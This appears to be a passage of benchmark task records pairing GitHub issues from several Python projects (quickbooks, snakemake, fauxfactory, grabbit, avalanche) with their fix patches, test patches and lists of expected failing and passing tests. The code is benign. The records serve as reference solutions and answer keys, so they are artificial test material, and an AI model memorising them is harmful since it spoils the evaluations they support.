diff --git a/quickbooks/objects/customer.py b/quickbooks/objects/customer.py
index 1bbdeed..0f43bfd 100644
--- a/quickbooks/objects/customer.py
+++ b/quickbooks/objects/customer.py
@@ -57,6 +57,7 @@ class Customer(QuickbooksManagedObject, QuickbooksTransactionEntity):
self.ResaleNum = ""
self.Level = 0
self.OpenBalanceDate = ""
+ self.PrimaryTaxIdentifier = ""
self.BillAddr = None
self.ShipAddr = None
diff --git a/quickbooks/objects/paymentmethod.py b/quickbooks/objects/paymentmethod.py
index ba4a9eb..dd4da4c 100644
--- a/quickbooks/objects/paymentmethod.py
+++ b/quickbooks/objects/paymentmethod.py
@@ -29,3 +29,6 @@ class PaymentMethod(QuickbooksManagedObject, QuickbooksTransactionEntity):
ref.name = self.Name
ref.type = self.qbo_object_name
ref.value = self.Id
+
+ return ref
+
diff --git a/quickbooks/objects/purchase.py b/quickbooks/objects/purchase.py
index 18fbe9d..853dd67 100644
--- a/quickbooks/objects/purchase.py
+++ b/quickbooks/objects/purchase.py
@@ -62,7 +62,7 @@ class Purchase(DeleteMixin, QuickbooksManagedObject, QuickbooksTransactionEntity
self.TxnTaxDetail = None
self.DepartmentRef = None
self.AccountRef = None
- self.EnitityRef = None
+ self.EntityRef = None
self.CurrencyRef = None
self.PaymentMethodRef = None
self.RemitToAddr = None
|
ej2/python-quickbooks
|
3e8b24d7d3b2156ba868d415dfc98c2a5a9d2cb5
|
diff --git a/tests/unit/objects/test_paymentmethod.py b/tests/unit/objects/test_paymentmethod.py
index 8016214..5978808 100644
--- a/tests/unit/objects/test_paymentmethod.py
+++ b/tests/unit/objects/test_paymentmethod.py
@@ -17,3 +17,14 @@ class PaymentMethodTests(unittest.TestCase):
result = client.isvalid_object_name(obj.qbo_object_name)
self.assertTrue(result)
+
+ def test_to_ref(self):
+ obj = PaymentMethod()
+ obj.Name = "test"
+ obj.Id = 12
+
+ ref = obj.to_ref()
+
+ self.assertEquals(ref.name, "test")
+ self.assertEquals(ref.type, "PaymentMethod")
+ self.assertEquals(ref.value, 12)
|
Typo in Purchase attribute: self.EnitityRef = None
/quickbooks/objects/purchase.py:65
Should be `self.EntityRef`
|
0.0
|
3e8b24d7d3b2156ba868d415dfc98c2a5a9d2cb5
|
[
"tests/unit/objects/test_paymentmethod.py::PaymentMethodTests::test_to_ref"
] |
[
"tests/unit/objects/test_paymentmethod.py::PaymentMethodTests::test_unicode",
"tests/unit/objects/test_paymentmethod.py::PaymentMethodTests::test_valid_object_name"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-03-20 12:02:02+00:00
|
mit
| 2,084
|
|
snakemake__snakemake-127
|
diff --git a/docs/project_info/faq.rst b/docs/project_info/faq.rst
index 91321e44..e1ef4d2a 100644
--- a/docs/project_info/faq.rst
+++ b/docs/project_info/faq.rst
@@ -100,6 +100,25 @@ In order to infer the IDs from present files, Snakemake provides the ``glob_wild
The function matches the given pattern against the files present in the filesystem and thereby infers the values for all wildcards in the pattern. A named tuple that contains a list of values for each wildcard is returned. Here, this named tuple has only one item, that is the list of values for the wildcard ``{id}``.
+I don't want expand to use the product of every wildcard, what can I do?
+------------------------------------------------------------------------
+
+By default the expand function uses ``itertools.product`` to create every combination of the supplied wildcards.
+Expand takes an optional, second positional argument which can customize how wildcards are combined.
+To create the list ``["a_1.txt", "b_2.txt", "c_3.txt"]``, invoke expand as:
+``expand("{sample}_{id}.txt", zip, sample=["a", "b", "c"], id=["1", "2", "3"])``
+
+I don't want expand to use every wildcard, what can I do?
+---------------------------------------------------------
+
+Sometimes partially expanding wildcards is useful to define inputs which still depend on some wildcards.
+Expand takes an optional keyword argument, allow_missing=True, that will format only wildcards which are supplied, leaving others as is.
+To create the list ``["{sample}_1.txt", "{sample}_2.txt"]``, invoke expand as:
+``expand("{sample}_{id}.txt", id=["1", "2"], allow_missing=True)``
+If the filename contains the wildcard ``allow_missing``, it will be formatted normally:
+``expand("{allow_missing}.txt", allow_missing=True)`` returns ``["True.txt"]``.
+
+
Snakemake complains about a cyclic dependency or a PeriodicWildcardError. What can I do?
----------------------------------------------------------------------------------------
diff --git a/snakemake/io.py b/snakemake/io.py
index fd7d5dda..a976a9e9 100755
--- a/snakemake/io.py
+++ b/snakemake/io.py
@@ -17,6 +17,7 @@ import functools
import subprocess as sp
from itertools import product, chain
from contextlib import contextmanager
+import string
import collections
import yaml
@@ -892,7 +893,8 @@ def expand(*args, **wildcards):
second arg (optional): a function to combine wildcard values
(itertools.product per default)
**wildcards -- the wildcards as keyword arguments
- with their values as lists
+ with their values as lists. If allow_missing=True is included
+ wildcards in filepattern without values will stay unformatted.
"""
filepatterns = args[0]
if len(args) == 1:
@@ -916,12 +918,27 @@ def expand(*args, **wildcards):
"of expand (e.g. 'temp(expand(\"plots/{sample}.pdf\", sample=SAMPLES))')."
)
+ # check if remove missing is provided
+ format_dict = dict
+ if "allow_missing" in wildcards and wildcards["allow_missing"] is True:
+
+ class FormatDict(dict):
+ def __missing__(self, key):
+ return "{" + key + "}"
+
+ format_dict = FormatDict
+ # check that remove missing is not a wildcard in the filepatterns
+ for filepattern in filepatterns:
+ if "allow_missing" in re.findall(r"{([^}\.[!:]+)", filepattern):
+ format_dict = dict
+ break
+
# remove unused wildcards to avoid duplicate filepatterns
wildcards = {
filepattern: {
k: v
for k, v in wildcards.items()
- if k in re.findall("{([^}\.[!:]+)", filepattern)
+ if k in re.findall(r"{([^}\.[!:]+)", filepattern)
}
for filepattern in filepatterns
}
@@ -934,11 +951,12 @@ def expand(*args, **wildcards):
values = [values]
yield [(wildcard, value) for value in values]
+ formatter = string.Formatter()
try:
return [
- filepattern.format(**comb)
+ formatter.vformat(filepattern, (), comb)
for filepattern in filepatterns
- for comb in map(dict, combinator(*flatten(wildcards[filepattern])))
+ for comb in map(format_dict, combinator(*flatten(wildcards[filepattern])))
]
except KeyError as e:
raise WildcardError("No values given for wildcard {}.".format(e))
@@ -1050,7 +1068,7 @@ def update_wildcard_constraints(
def split_git_path(path):
- file_sub = re.sub("^git\+file:/+", "/", path)
+ file_sub = re.sub(r"^git\+file:/+", "/", path)
(file_path, version) = file_sub.split("@")
file_path = os.path.realpath(file_path)
root_path = get_git_root(file_path)
|
snakemake/snakemake
|
0607695047290effb44367cd004523e5e3398171
|
diff --git a/tests/test_expand.py b/tests/test_expand.py
new file mode 100644
index 00000000..8094a38b
--- /dev/null
+++ b/tests/test_expand.py
@@ -0,0 +1,67 @@
+from snakemake.io import expand
+from snakemake.exceptions import WildcardError
+import pytest
+
+
+def test_simple_expand():
+ # single filepattern
+ assert expand("{a}.out", a="test") == ["test.out"]
+ # multiple filepatterns
+ assert expand(["{a}.out", "{b}.out"], a="a", b="b") == ["a.out", "b.out"]
+ # multiple wildcards
+ assert expand("{a}.out", a=["1", "2", "3"]) == ["1.out", "2.out", "3.out"]
+ # multiple wildcards and patterns
+ assert expand(["{a}_{b}.ab", "{b}.b"], a="1 2".split(), b="3 4".split()) == [
+ "1_3.ab",
+ "1_4.ab",
+ "2_3.ab",
+ "2_4.ab",
+ "3.b",
+ "4.b",
+ ]
+ # replace product
+ assert expand(["{a}_{b}.ab", "{b}.b"], zip, a="1 2".split(), b="3 4".split()) == [
+ "1_3.ab",
+ "2_4.ab",
+ "3.b",
+ "4.b",
+ ]
+
+
+def test_allow_missing():
+ # single filepattern
+ assert expand("{a}_{b}.out", allow_missing=True) == ["{a}_{b}.out"]
+ assert expand("{a}_{b}.out", a="test", allow_missing=True) == ["test_{b}.out"]
+ # none missing
+ assert expand("{a}.out", a="test", allow_missing=True) == ["test.out"]
+ # wildcard is allow_missing
+ assert expand("{allow_missing}.out", allow_missing=True) == ["True.out"]
+ # allow_missing not True
+ assert expand("{a}.out", a="test", allow_missing="test2") == ["test.out"]
+ with pytest.raises(WildcardError) as e:
+ expand("{a}.out", allow_missing="test2")
+ assert str(e.value) == "No values given for wildcard 'a'."
+
+ # multiple filepatterns
+ assert expand(["{a}.out", "{b}.out"], allow_missing=True) == ["{a}.out", "{b}.out"]
+ # multiple wildcards
+ assert expand("{a}_{b}.out", a=["1", "2", "3"], allow_missing=True) == [
+ "1_{b}.out",
+ "2_{b}.out",
+ "3_{b}.out",
+ ]
+ # multiple wildcards and patterns
+ assert expand(
+ ["{a}_{b}_{C}.ab", "{b}_{c}.b"],
+ a="1 2".split(),
+ b="3 4".split(),
+ allow_missing=True,
+ ) == ["1_3_{C}.ab", "1_4_{C}.ab", "2_3_{C}.ab", "2_4_{C}.ab", "3_{c}.b", "4_{c}.b"]
+ # replace product
+ assert expand(
+ ["{a}_{b}_{C}.ab", "{b}_{c}.b"],
+ zip,
+ a="1 2".split(),
+ b="3 4".split(),
+ allow_missing=True,
+ ) == ["1_3_{C}.ab", "2_4_{C}.ab", "3_{c}.b", "4_{c}.b"]
|
A utility function to partially format strings with wildcards
**Is your feature request related to a problem? Please describe.**
In the workflow, we usually need to deal with multiple wildcards.
It would be nice if there were a function to partially format the input string with multiple wildcards.
Maybe this function already exists and I'm just not aware of it.
For example:
```
foo = "{a}_{b}.txt"
result = format_cards(foo, a="foo")
print(result)
# result = "foo_{b}.txt"
```
**Describe the solution you'd like**
Here is a [solution](https://stackoverflow.com/questions/11283961/partial-string-formatting) I found on StackOverflow.
```
def format_cards(template, **kwargs):
    import string

    class FormatDict(dict):
        def __missing__(self, key):
            return "{" + key + "}"

    formatter = string.Formatter()
    mapping = FormatDict(**kwargs)
    return formatter.vformat(template, (), mapping)
```
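For reference, a self-contained check of the partial-formatting behaviour requested above (plain Python, independent of snakemake; `partial_format` is just an illustrative name):
```python
import string

class FormatDict(dict):
    def __missing__(self, key):
        # keep unknown fields as "{key}" so they can be expanded later
        return "{" + key + "}"

def partial_format(template, **kwargs):
    return string.Formatter().vformat(template, (), FormatDict(**kwargs))

assert partial_format("{a}_{b}.txt", a="foo") == "foo_{b}.txt"
assert partial_format("{a}_{b}.txt", a="foo", b="1") == "foo_1.txt"
```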
|
0.0
|
0607695047290effb44367cd004523e5e3398171
|
[
"tests/test_expand.py::test_allow_missing"
] |
[
"tests/test_expand.py::test_simple_expand"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-11-26 17:52:05+00:00
|
mit
| 5,571
|
|
omaciel__fauxfactory-87
|
diff --git a/fauxfactory/__init__.py b/fauxfactory/__init__.py
index a20be48..2d55c03 100644
--- a/fauxfactory/__init__.py
+++ b/fauxfactory/__init__.py
@@ -9,7 +9,6 @@ import sys
import unicodedata
import uuid
import warnings
-
from collections import Iterable
from functools import wraps
@@ -103,15 +102,67 @@ def _unicode_letters_generator():
UNICODE_LETTERS = [c for c in _unicode_letters_generator()]
+def _check_validation(fcn):
+ """Simple decorator to validate values generate by fcn accordingly to
+ parameters `validator`, `default` and `tries`
+
+ :param fcn: function to be enhanced
+ :return: decorated function
+ """
+
+ @wraps(fcn)
+ def validate(*args, **kwargs):
+ validator = kwargs.get('validator')
+ default = kwargs.get('default')
+ tries = kwargs.get('tries', 10)
+ if validator and default is None:
+ raise ValueError('If "validator" param is defined, "default" '
+ 'parameter must not be None')
+ if validator is None:
+ def validator_fcn(_):
+ return True
+ else:
+ validator_fcn = validator
+
+ if not callable(validator_fcn):
+ def regex_validator(value):
+ return re.match(validator, value)
+
+ validator_fcn = regex_validator
+
+ # Removing params related to validation but not fcn
+ for key in ('validator', 'default', 'tries'):
+ if key in kwargs:
+ kwargs.pop(key)
+
+ for _ in range(tries):
+ value = fcn(*args, **kwargs)
+ if validator_fcn(value):
+ return value
+
+ return default
+
+ return validate
+
+
# Public Functions ------------------------------------------------------------
-def gen_string(str_type, length=None):
+def gen_string(str_type, length=None, validator=None, default=None, tries=10):
"""A simple wrapper that calls other string generation methods.
:param str str_type: The type of string which should be generated.
:param int length: The length of the generated string. Must be 1 or
greater.
+ :param validator: Function or regex (str).
+ If a function it must receive one parameter and return True if value
+ can be used and False of another value need to be generated.
+ If str it will be used as regex to validate the generated value.
+ Default is None which will not validate the value.
+ :param tries: number of times validator must be called before returning
+ `default`. Default is 10.
+ :param default: If validator returns false a number of `tries` times, this
+ value is returned instead. Must be defined if validator is not None
:raises: ``ValueError`` if an invalid ``str_type`` is specified.
:returns: A string.
:rtype: str
@@ -146,10 +197,11 @@ def gen_string(str_type, length=None):
)
method = str_types_functions[str_type_lower]
if length is None:
- return method()
- return method(length)
+ return method(validator=validator, default=default, tries=tries)
+ return method(length, validator=validator, default=default, tries=tries)
+@_check_validation
def gen_alpha(length=10):
"""Returns a random string made up of alpha characters.
@@ -170,6 +222,7 @@ def gen_alpha(length=10):
return _make_unicode(output_string)
+@_check_validation
def gen_alphanumeric(length=10):
"""Returns a random string made up of alpha and numeric characters.
@@ -230,6 +283,7 @@ def gen_choice(choices):
return random.choice(choices)
+@_check_validation
def gen_cjk(length=10):
"""Returns a random string made up of CJK characters.
(Source: Wikipedia - CJK Unified Ideographs)
@@ -257,6 +311,7 @@ def gen_cjk(length=10):
return _make_unicode(output)
+@_check_validation
def gen_cyrillic(length=10):
"""Returns a random string made up of Cyrillic characters.
@@ -362,6 +417,7 @@ def gen_datetime(min_date=None, max_date=None):
return min_date + datetime.timedelta(seconds=seconds)
+@_check_validation
def gen_email(name=None, domain=None, tlds=None):
"""Generates a random email address.
@@ -488,6 +544,7 @@ def gen_iplum(words=None, paragraphs=None):
return _make_unicode(result.rstrip())
+@_check_validation
def gen_latin1(length=10):
"""Returns a random string made up of UTF-8 characters.
(Font: Wikipedia - Latin-1 Supplement Unicode Block)
@@ -542,6 +599,7 @@ def gen_negative_integer():
return gen_integer(max_value=max_value)
+@_check_validation
def gen_ipaddr(ip3=False, ipv6=False, prefix=()):
"""Generates a random IP address.
You can also specify an IP address prefix if you are interested in
@@ -599,6 +657,7 @@ def gen_ipaddr(ip3=False, ipv6=False, prefix=()):
return _make_unicode(ipaddr)
+@_check_validation
def gen_mac(delimiter=':', multicast=None, locally=None):
"""Generates a random MAC address.
@@ -647,6 +706,7 @@ def gen_mac(delimiter=':', multicast=None, locally=None):
return _make_unicode(mac)
+@_check_validation
def gen_netmask(min_cidr=1, max_cidr=31):
"""Generates a random valid netmask.
@@ -674,6 +734,7 @@ def gen_netmask(min_cidr=1, max_cidr=31):
return VALID_NETMASKS[random.randint(min_cidr, max_cidr)]
+@_check_validation
def gen_numeric_string(length=10):
"""Returns a random string made up of numbers.
@@ -723,6 +784,7 @@ def gen_time():
)
+@_check_validation
def gen_url(scheme=None, subdomain=None, tlds=None):
"""Generates a random URL address
@@ -765,6 +827,7 @@ def gen_url(scheme=None, subdomain=None, tlds=None):
return _make_unicode(url)
+@_check_validation
def gen_utf8(length=10):
"""Returns a random string made up of UTF-8 letters characters, as per
`RFC 3629`_.
@@ -783,6 +846,7 @@ def gen_utf8(length=10):
return u''.join([random.choice(UNICODE_LETTERS) for _ in range(length)])
+@_check_validation
def gen_uuid():
"""Generates a UUID string (universally unique identifiers).
@@ -796,6 +860,7 @@ def gen_uuid():
return output_uuid
+@_check_validation
def gen_html(length=10):
"""Returns a random string made up of html characters.
@@ -816,6 +881,7 @@ def gen_html(length=10):
return _make_unicode(output_string)
+@_check_validation
def gen_html_with_total_len(length=10):
"""Returns a random string made up of html characters.
This differ from fauxfactory.gen_html because length takes html tag chars
diff --git a/requirements-optional.txt b/requirements-optional.txt
index 7b50cdd..2c1ab56 100644
--- a/requirements-optional.txt
+++ b/requirements-optional.txt
@@ -3,3 +3,4 @@ coveralls
flake8
pylint
Sphinx
+mock
|
omaciel/fauxfactory
|
87611f293f9329ea024d93f5699c287f0725b5e5
|
diff --git a/tests/test_check_validation.py b/tests/test_check_validation.py
new file mode 100644
index 0000000..8ba9460
--- /dev/null
+++ b/tests/test_check_validation.py
@@ -0,0 +1,69 @@
+# -*- coding: utf-8 -*-
+
+from sys import version_info
+
+from fauxfactory import _check_validation
+
+if version_info[0:2] == (2, 6):
+ import unittest2 as unittest
+else:
+ import unittest
+ if version_info[0] == 2:
+ from mock import Mock
+ else:
+ from unittest.mock import Mock
+
+
+@_check_validation
+def decorated_f():
+ return 'not a number'
+
+
+class CheckValidationTestCase(unittest.TestCase):
+ """_check_validation decorator tests"""
+
+ def test_no_validator_defined(self):
+ """Check result value of decorated function is returned when no
+ validator is provided
+ """
+ self.assertEqual('not a number', decorated_f())
+
+ def test_validator_defined_but_default_is_none(self):
+ """Check defining validator but not default raises an error"""
+ self.assertRaises(ValueError, decorated_f, validator=lambda _: True)
+
+ def test_regex(self):
+ """Check regex validation when validator is a string"""
+ self.assertEqual(
+ 'my default', decorated_f(validator=r'\d.*', default='my default'))
+ self.assertEqual(
+ 'not a number', decorated_f(validator=r'.*', default='my default'))
+
+ def test_callable(self):
+ """Check validation when validator is a callable"""
+ callable = Mock(return_value=False)
+
+ # Default of 10 unsuccessful tries
+ self.assertEqual(
+ 'my default',
+ decorated_f(validator=callable, default='my default')
+ )
+ callable.assert_called_with('not a number')
+ self.assertEqual(10, callable.call_count)
+
+ # 1 unsuccessful try
+ callable.reset_mock()
+ self.assertEqual(
+ 'my default',
+ decorated_f(validator=callable, default='my default', tries=1)
+ )
+ callable.assert_called_once_with('not a number')
+
+ # 1 successful try
+ callable.reset_mock()
+ callable.return_value = True
+ self.assertEqual(
+ 'not a number',
+ decorated_f(validator=callable, default='my default', tries=10)
+ )
+ callable.assert_called_once_with('not a number')
|
add validator argument
Example: we want to generate names, but names cannot start with numbers.
```python
from fauxfactory import gen_string

name = gen_string(
    'alpha',
    validator=lambda x: not x.startswith(('1', '2', '3', '4', '5', '6', '7', '8', '9', '0')),
    default='foobar',
    tries=10
)

# or simpler
name = gen_string(
    'alpha',
    validator=lambda x: not x[0].isdigit(),
    default='foobar',
    tries=10
)
```
So fauxfactory should accept a `validator` which should return True; otherwise the value is `None` or `default`. If `tries` is set, it retries generation up to that many times; if `tries` = `0` it keeps generating until the validator is met!
BONUS: the validator may also be an `re.Pattern` instance instead of a callable, in which case the generated value is checked against the regex.
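A minimal, library-independent sketch of the requested retry-and-validate behaviour (this is not fauxfactory's implementation; `gen_with_validator` and `gen_alnum` are illustrative stand-ins):
```python
import random
import re
import string

def gen_with_validator(generate, validator=None, default=None, tries=10):
    # call `generate` until `validator` accepts the value; fall back to `default`
    if validator is None:
        return generate()
    check = validator if callable(validator) else (lambda value: re.match(validator, value))
    for _ in range(tries):
        value = generate()
        if check(value):
            return value
    return default

def gen_alnum(length=10):
    # stand-in generator (letters and digits, so the validator has something to reject)
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

name = gen_with_validator(gen_alnum, validator=lambda x: not x[0].isdigit(), default='foobar')
print(name)
```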
|
0.0
|
87611f293f9329ea024d93f5699c287f0725b5e5
|
[
"tests/test_check_validation.py::CheckValidationTestCase::test_callable",
"tests/test_check_validation.py::CheckValidationTestCase::test_no_validator_defined",
"tests/test_check_validation.py::CheckValidationTestCase::test_regex",
"tests/test_check_validation.py::CheckValidationTestCase::test_validator_defined_but_default_is_none"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-03-15 13:14:22+00:00
|
apache-2.0
| 4,349
|
|
grabbles__grabbit-6
|
diff --git a/grabbit/core.py b/grabbit/core.py
index 84009db..a2a87be 100644
--- a/grabbit/core.py
+++ b/grabbit/core.py
@@ -197,7 +197,7 @@ class Layout(object):
return_type (str): Type of result to return. Valid values:
'tuple': returns a list of namedtuples containing file name as
well as attribute/value pairs for all named entities.
- 'file': returns a list of File instances.
+ 'file': returns a list of matching filenames.
'dir': returns a list of directories.
'id': returns a list of unique IDs. Must be used together with
a valid target.
@@ -222,7 +222,7 @@ class Layout(object):
result.append(file)
if return_type == 'file':
- return result
+ return natural_sort([f.path for f in result])
if return_type == 'tuple':
result = [r.as_named_tuple() for r in result]
|
grabbles/grabbit
|
afe361809ca5c040a46caa9f8a9bae017bcc706e
|
diff --git a/grabbit/tests/test_core.py b/grabbit/tests/test_core.py
index 0c92377..11da286 100644
--- a/grabbit/tests/test_core.py
+++ b/grabbit/tests/test_core.py
@@ -127,6 +127,8 @@ class TestLayout:
result = layout.get(target='subject', return_type='dir')
assert os.path.exists(result[0])
assert os.path.isdir(result[0])
+ result = layout.get(target='subject', type='phasediff', return_type='file')
+ assert all([os.path.exists(f) for f in result])
def test_unique_and_count(self, layout):
result = layout.unique('subject')
|
Redefining File class is confusing
Returning File objects, which are something different than Python's built-in [file object](https://docs.python.org/3/glossary.html#term-file-object), is confusing.
|
0.0
|
afe361809ca5c040a46caa9f8a9bae017bcc706e
|
[
"grabbit/tests/test_core.py::TestLayout::test_querying"
] |
[
"grabbit/tests/test_core.py::TestFile::test_init",
"grabbit/tests/test_core.py::TestFile::test_matches",
"grabbit/tests/test_core.py::TestFile::test_named_tuple",
"grabbit/tests/test_core.py::TestEntity::test_init",
"grabbit/tests/test_core.py::TestEntity::test_matches",
"grabbit/tests/test_core.py::TestEntity::test_unique_and_count",
"grabbit/tests/test_core.py::TestEntity::test_add_file",
"grabbit/tests/test_core.py::TestLayout::test_init",
"grabbit/tests/test_core.py::TestLayout::test_absolute_paths",
"grabbit/tests/test_core.py::TestLayout::test_dynamic_getters",
"grabbit/tests/test_core.py::TestLayout::test_unique_and_count"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-08-18 05:30:39+00:00
|
mit
| 2,661
|
|
ContinualAI__avalanche-1216
|
diff --git a/avalanche/benchmarks/utils/data.py b/avalanche/benchmarks/utils/data.py
index 533d79ee..9c11f60f 100644
--- a/avalanche/benchmarks/utils/data.py
+++ b/avalanche/benchmarks/utils/data.py
@@ -101,6 +101,10 @@ class AvalancheDataset(FlatData):
DeprecationWarning,
)
+ if issubclass(type(datasets), TorchDataset) or \
+ issubclass(type(datasets), AvalancheDataset):
+ datasets = [datasets]
+
# NOTES on implementation:
# - raw datasets operations are implemented by _FlatData
# - data attributes are implemented by DataAttribute
diff --git a/avalanche/training/templates/base.py b/avalanche/training/templates/base.py
index c0899806..532e8332 100644
--- a/avalanche/training/templates/base.py
+++ b/avalanche/training/templates/base.py
@@ -1,4 +1,5 @@
import warnings
+from collections import defaultdict
from typing import Iterable, Sequence, Optional, Union, List
import torch
@@ -90,6 +91,9 @@ class BaseTemplate:
:param eval_streams: sequence of streams for evaluation.
If None: use training experiences for evaluation.
Use [] if you do not want to evaluate during training.
+ Experiences in `eval_streams` are grouped by stream name
+ when calling `eval`. If you use multiple streams, they must
+ have different names.
"""
self.is_training = True
self._stop_training = False
@@ -102,7 +106,7 @@ class BaseTemplate:
experiences = [experiences]
if eval_streams is None:
eval_streams = [experiences]
- self._eval_streams = eval_streams
+ self._eval_streams = _group_experiences_by_stream(eval_streams)
self._before_training(**kwargs)
@@ -244,3 +248,20 @@ class BaseTemplate:
def _after_eval_exp(self, **kwargs):
trigger_plugins(self, "after_eval_exp", **kwargs)
+
+
+def _group_experiences_by_stream(eval_streams):
+ exps = []
+ # First, we unpack the list of experiences.
+ for exp in eval_streams:
+ if isinstance(exp, Iterable):
+ exps.extend(exp)
+ else:
+ exps.append(exp)
+ # Then, we group them by stream.
+ exps_by_stream = defaultdict(list)
+ for exp in exps:
+ sname = exp.origin_stream.name
+ exps_by_stream[sname].append(exp)
+ # Finally, we return a list of lists.
+ return list(exps_by_stream.values())
|
ContinualAI/avalanche
|
f3abbc5500c928bb5fc5bcf4b31fcd0b504fdf26
|
diff --git a/tests/test_avalanche_dataset.py b/tests/test_avalanche_dataset.py
index e7cf460b..67ccdecc 100644
--- a/tests/test_avalanche_dataset.py
+++ b/tests/test_avalanche_dataset.py
@@ -56,6 +56,17 @@ class FrozenTransformGroupsCenterCrop:
class AvalancheDatasetTests(unittest.TestCase):
+
+ def test_avalanche_dataset_creation_without_list(self):
+ dataset_mnist = load_image_benchmark()
+ dataset = AvalancheDataset(dataset_mnist)
+ self.assertIsInstance(dataset, AvalancheDataset)
+ self.assertEqual(len(dataset_mnist), len(dataset))
+
+ dataset = AvalancheDataset(dataset)
+ self.assertIsInstance(dataset, AvalancheDataset)
+ self.assertEqual(len(dataset_mnist), len(dataset))
+
def test_disallowed_attribute_name(self):
d_sz = 3
xdata = torch.rand(d_sz, 2)
diff --git a/tests/training/test_strategies.py b/tests/training/test_strategies.py
index 84fae146..a49b2d20 100644
--- a/tests/training/test_strategies.py
+++ b/tests/training/test_strategies.py
@@ -48,11 +48,37 @@ from avalanche.training.supervised.icarl import ICaRL
from avalanche.training.supervised.joint_training import AlreadyTrainedError
from avalanche.training.supervised.strategy_wrappers import PNNStrategy
from avalanche.training.templates import SupervisedTemplate
+from avalanche.training.templates.base import _group_experiences_by_stream
from avalanche.training.utils import get_last_fc_layer
from tests.unit_tests_utils import get_fast_benchmark, get_device
class BaseStrategyTest(unittest.TestCase):
+ def test_eval_streams_normalization(self):
+ benchmark = get_fast_benchmark()
+ train_len = len(benchmark.train_stream)
+ test_len = len(benchmark.test_stream)
+
+ res = _group_experiences_by_stream(benchmark.test_stream)
+ assert len(res) == 1
+ assert len(res[0]) == test_len
+
+ res = _group_experiences_by_stream([benchmark.test_stream])
+ assert len(res) == 1
+ assert len(res[0]) == test_len
+
+ res = _group_experiences_by_stream(
+ [*benchmark.test_stream, *benchmark.train_stream])
+ assert len(res) == 2
+ assert len(res[0]) == test_len
+ assert len(res[1]) == train_len
+
+ res = _group_experiences_by_stream(
+ [benchmark.test_stream, benchmark.train_stream])
+ assert len(res) == 2
+ assert len(res[0]) == test_len
+ assert len(res[1]) == train_len
+
def test_periodic_eval(self):
model = SimpleMLP(input_size=6, hidden_size=10)
model.classifier = IncrementalClassifier(model.classifier.in_features)
|
bug for stream-level metrics in periodic eval
Periodic eval is broken in some subtle cases. Instead of calling `eval` once on the entire stream, it calls it separately for each experience, breaking stream-level metrics.
Reproduce:
```
from avalanche.benchmarks import SplitMNIST
from avalanche.training import Naive
from avalanche.models import SimpleMLP
if __name__ == '__main__':
    benchmark = SplitMNIST(5)
    model = SimpleMLP()
    strat = Naive(model, None, eval_mb_size=512, eval_every=1)
    stream = benchmark.test_stream
    strat.train(stream[0], eval_streams=list(stream[:2]))
```
outputs:
```
-- >> Start of training phase << --
-- >> Start of eval phase << --
-- Starting eval on experience 0 (Task 0) from test stream --
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:05<00:00, 1.08s/it]
> Eval on experience 0 (Task 0) from test stream ended.
Loss_Exp/eval_phase/test_stream/Task000/Exp000 = 2.3881
Top1_Acc_Exp/eval_phase/test_stream/Task000/Exp000 = 0.0033
-- >> End of eval phase << --
Loss_Stream/eval_phase/test_stream/Task000 = 2.3881
Top1_Acc_Stream/eval_phase/test_stream/Task000 = 0.0033
-- >> Start of eval phase << --
-- Starting eval on experience 1 (Task 0) from test stream --
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:01<00:00, 2.12it/s]
> Eval on experience 1 (Task 0) from test stream ended.
Loss_Exp/eval_phase/test_stream/Task000/Exp001 = 2.3041
Top1_Acc_Exp/eval_phase/test_stream/Task000/Exp001 = 0.2129
-- >> End of eval phase << --
Loss_Stream/eval_phase/test_stream/Task000 = 2.3041
Top1_Acc_Stream/eval_phase/test_stream/Task000 = 0.2129
```
which means it's calling `eval` two times instead of making a single call with the entire stream.
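The corresponding fix regroups the flat list of evaluation experiences into one list per stream before calling `eval`. A small self-contained sketch of that grouping step (the `Experience`/`Stream` classes below are plain stand-ins, not Avalanche classes; only the `origin_stream.name` attribute mirrors the real API):
```python
from collections import defaultdict
from collections.abc import Iterable

def group_experiences_by_stream(eval_streams):
    # flatten streams and single experiences into one list of experiences
    exps = []
    for item in eval_streams:
        if isinstance(item, Iterable):
            exps.extend(item)
        else:
            exps.append(item)
    # regroup them by the name of the stream they originate from
    by_stream = defaultdict(list)
    for exp in exps:
        by_stream[exp.origin_stream.name].append(exp)
    return list(by_stream.values())

class Experience:
    def __init__(self, stream):
        self.origin_stream = stream

class Stream:
    def __init__(self, name, n):
        self.name = name
        self._exps = [Experience(self) for _ in range(n)]
    def __iter__(self):
        return iter(self._exps)

groups = group_experiences_by_stream([Stream("test", 3), Stream("train", 2)])
print([len(g) for g in groups])   # [3, 2] -> eval is called once per stream
```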
|
0.0
|
f3abbc5500c928bb5fc5bcf4b31fcd0b504fdf26
|
[
"tests/test_avalanche_dataset.py::AvalancheDatasetTests::test_avalanche_dataset_tensor_task_labels",
"tests/test_avalanche_dataset.py::AvalancheDatasetTests::test_disallowed_attribute_name",
"tests/test_avalanche_dataset.py::AvalancheDatasetTests::test_subset_subset_merge",
"tests/training/test_strategies.py::BaseStrategyTest::test_early_stop",
"tests/training/test_strategies.py::BaseStrategyTest::test_eval_streams_normalization",
"tests/training/test_strategies.py::BaseStrategyTest::test_forward_hooks",
"tests/training/test_strategies.py::BaseStrategyTest::test_periodic_eval",
"tests/training/test_strategies.py::BaseStrategyTest::test_plugins_compatibility_checks",
"tests/training/test_strategies.py::StrategyTest::test_agem",
"tests/training/test_strategies.py::StrategyTest::test_cope",
"tests/training/test_strategies.py::StrategyTest::test_cumulative",
"tests/training/test_strategies.py::StrategyTest::test_cwrstar",
"tests/training/test_strategies.py::StrategyTest::test_ewc",
"tests/training/test_strategies.py::StrategyTest::test_ewc_online",
"tests/training/test_strategies.py::StrategyTest::test_gdumb",
"tests/training/test_strategies.py::StrategyTest::test_gem",
"tests/training/test_strategies.py::StrategyTest::test_icarl",
